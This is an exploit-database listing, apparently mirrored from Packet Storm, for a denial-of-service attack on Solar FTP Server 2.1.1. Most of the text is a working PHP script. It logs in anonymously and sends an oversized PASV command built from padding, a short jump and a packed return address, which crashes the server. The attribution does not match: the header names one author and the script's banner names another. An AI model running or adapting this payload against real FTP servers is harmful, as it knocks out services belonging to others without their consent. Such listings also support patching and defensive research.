Share
## https://sploitus.com/exploit?id=PACKETSTORM:215920
=============================================================================================================================================
    | # Title     : Solar FTP Server 2.1.1 PASV Command - Denial of Service vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.exploit-db.com/apps/b604f672086663c6c97bfe0f10156f19-solarftps-setup.exe                                        |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Solar FTP Server version 2.1.1 remote denial of service exploit.
    	
    [+] save code as poc.php.
    
    [+] Usage = C:\www>php 2.php 127.0.0.1 21
    
    [+] PayLoad :
    
    <?php
    
    if ($argc < 2) {
        echo "[-] Usage: php script.php <ip addr>\n";
        exit(0);
    }
    
    $ip = $argv[1];
    
    if ($argc > 2) {
        $platform = $argv[2];
    }
    
    $ret = pack('L', 0x7C9572D8);
    
    $padding = str_repeat("\x43", 468);
    $junk = str_repeat("\x43", 1532);
    $frontpad = str_repeat("\x41", 100) . "\xEB\x30" . str_repeat("\x41", 21);
    $payload = $frontpad . $ret . $padding . $junk;
    
    echo "[+] Solar FTP 2.1.1 PASV - Denial of Service - DoS\n[+] Author: Fernando Mengali\n";
    echo "[+] Connecting to $ip\n";
    
    $socket = fsockopen($ip, 21, $errno, $errstr, 30);
    if (!$socket) {
        echo "[-] Connection to $ip failed!\n";
        exit(0);
    }
    
    echo "[+] Exploiting\n";
    echo "[*] Sending payload to command PASV...\n";
    
    fwrite($socket, "USER anon\r\n");
    fread($socket, 1024);
    fwrite($socket, "PASS anon\r\n");
    fread($socket, 1024);
    fwrite($socket, "PASV " . $payload . "\r\n");
    
    echo "[+] Done - Exploited\n";
    
    fclose($socket);
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================